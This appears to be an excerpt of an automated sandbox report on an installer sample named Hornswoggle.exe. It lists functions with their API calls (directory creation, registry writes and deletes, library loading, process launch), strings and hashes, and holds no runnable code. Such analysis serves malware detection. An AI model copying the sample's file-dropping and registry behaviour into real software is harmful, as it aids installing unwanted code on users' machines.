
Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\
API String ID: 2531174081-3508747174
Opcode ID: 871ddc24a54fb64aeccd7c8069c75cad2e612add14608668d5a5d769126a8d66
Instruction ID: 0932fbc12a6b25bcac4b474ac1e4098b180b1803f9783341f4c7184ef00e87b2
Opcode Fuzzy Hash: 871ddc24a54fb64aeccd7c8069c75cad2e612add14608668d5a5d769126a8d66
Instruction Fuzzy Hash: 7E218C71E00508BADF119FA5CD84EDFBFA9EF04358F14807AF944A6291C7789A41CFA8

Function 00405542 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405585
GetLastError.KERNEL32 ref: 00405599
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055AE
GetLastError.KERNEL32 ref: 004055B8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405568
ts@, xrefs: 00405548
C:\Users\user\Desktop, xrefs: 00405542
ds@, xrefs: 00405577

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-891493705
Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
Instruction ID: 9e56051543debb7748005a245647f72f9f0c442d478d44b0b7514676580bb89d
Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
Instruction Fuzzy Hash: 2701E571D14259EAEF119BA0CD487EFBBB9EB04354F008176E905B6280D378A604CBAA

Function 0040618E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
wsprintfA.USER32 ref: 004061DE
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2

Strings

UXTHEME, xrefs: 00406197
\, xrefs: 004061B6
%s%s.dll, xrefs: 004061D8

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
Instruction ID: 17d4186d305cf40b40e49104478d07e272734a7bb4b2e73e379b3f466295ecaf
Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
Instruction Fuzzy Hash: D1F0FC3095410567DB159768DC0DFFF365CBB08304F140176A546E51D2D574E9288B69

Function 00401F90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045

Strings

error, xrefs: 0040200F

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: error
API String ID: 2987980305-1574812785
Opcode ID: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
Instruction ID: 215a549463b1ff6cdb2c8ab56b147df35cc58612cba094cab406bca79a610b2d
Opcode Fuzzy Hash: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
Instruction Fuzzy Hash: A0212E76904215FBDF217F648E48A6E3670AB45318F30423BF701B62D0D7BC4942DA6E

Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx8391.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx8391.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx8391.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Strings

C:\Users\user\AppData\Local\Temp\nsx8391.tmp, xrefs: 004023B3, 004023C1, 004023D5, 004023E5, 004023F0

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx8391.tmp
API String ID: 1356686001-917378174
Opcode ID: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
Instruction ID: 5da3480c5977201a3ee5f00a5bba4dd76bcb837ef72d2191196963f4bf358416
Opcode Fuzzy Hash: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
Instruction Fuzzy Hash: C91175B1E00108BFEB10EFA4DE89EAF7A79EB54358F10403AF505B61D1D7B85D419B28

Function 00405B05 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405B19
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405B33

Strings

nsa, xrefs: 00405B10
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08
"C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 00405B05

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3754527686
Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
Instruction ID: 324d89babc139fd35718223d4ac3f7893030d86c2087b7febc7e38ed5d635a65
Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
Instruction Fuzzy Hash: ABF082367486086BDB109F55EC08B9BBBADDF91750F10C03BFA089A1D0D6B1B9548B59

Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
RegCloseKey.ADVAPI32(?), ref: 00402AE0
RegCloseKey.ADVAPI32(?), ref: 00402B05
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 917ca6d6ffb3dd8b327bedf28ae44dde583cf997761b7befe2e8046b2babecf8
Instruction ID: 2c69578fec59b839bbbb6554d628e5ed2d7180fb0bd31e8d2d7d3181fb534eb1
Opcode Fuzzy Hash: 917ca6d6ffb3dd8b327bedf28ae44dde583cf997761b7befe2e8046b2babecf8
Instruction Fuzzy Hash: 93113D71A00108BEDF229F90DE89DAA3B7DEB54349B504436F901F10A0D775AE51EB69

Function 004036F1 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403528,?), ref: 00403703
CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403528,?), ref: 00403717

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004036F6
C:\Users\user\AppData\Local\Temp\nsx8391.tmp\, xrefs: 00403727

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsx8391.tmp\
API String ID: 2962429428-2677098812
Opcode ID: bce50272980b2b115c412ee18181e99af888c32c9f017689cab30043875d87d7
Instruction ID: a64c404821d2138faf7c298dc7aa4842799881c741ebf925b7f901023762ac75
Opcode Fuzzy Hash: bce50272980b2b115c412ee18181e99af888c32c9f017689cab30043875d87d7
Instruction Fuzzy Hash: C6E086B0500620D6C524AF7CAD855463B196B413357208322F574F30F1C338AD435EAC

Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,75923410,?,75922EE0,00405725,?,75923410,75922EE0,00000000), ref: 0040597C
Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 00405542: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405585

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls, xrefs: 00401629

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls
API String ID: 1892508949-1499438891
Opcode ID: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
Instruction ID: f000a06b92b438bb55e13d50866b264c9e4ef6e61e5cb38cc97b05dde0840845
Opcode Fuzzy Hash: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
Instruction Fuzzy Hash: 3F110436504151BFEF217B654C405BF27B0EA92324738467FE592B22E6C63C0A42AA3E

Function 004059C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70

Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,75923410,?,75922EE0,00405725,?,75923410,75922EE0,00000000), ref: 0040597C
Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,75923410,?,75922EE0,00405725,?,75923410,75922EE0,00000000), ref: 00405A16
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,00405725,?,75923410,75922EE0), ref: 00405A26

Strings

C:\, xrefs: 004059C9, 004059CE, 004059D4, 00405A0F, 00405A15, 00405A1D, 00405A25

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
Instruction ID: c86e2d8d38d71570b191e9a15eff5061e4cbb4187268480765cc96090d0558f9
Opcode Fuzzy Hash: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
Instruction Fuzzy Hash: A2F07D71200D5052C73233350C4669F1644CE82374708023BF8A0B22D2D73C8D02CD7D

Function 004055F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
CloseHandle.KERNEL32(?), ref: 0040562A

Strings

Error launching installer, xrefs: 00405607

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
Instruction ID: f5a249c54adfd8c255b7380a03a9b1716d63bb632b604881324be9db7dcd8e21
Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
Instruction Fuzzy Hash: EAE0BFB4A002097FEB109B64ED45F7B76ACEB10704F908571BD15F2160D678A9518A79

Function 004068E3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
Instruction ID: 9d08257b753d1dc8d50a425e5d18a9377fc83dd762af72a05302a0d5f43d32a7
Opcode Fuzzy Hash: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
Instruction Fuzzy Hash: EDA13571E00228CBDB28CFA9C8547ADBBB1FF44305F15816ED856BB281D7785A96CF44

Function 00406AE4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
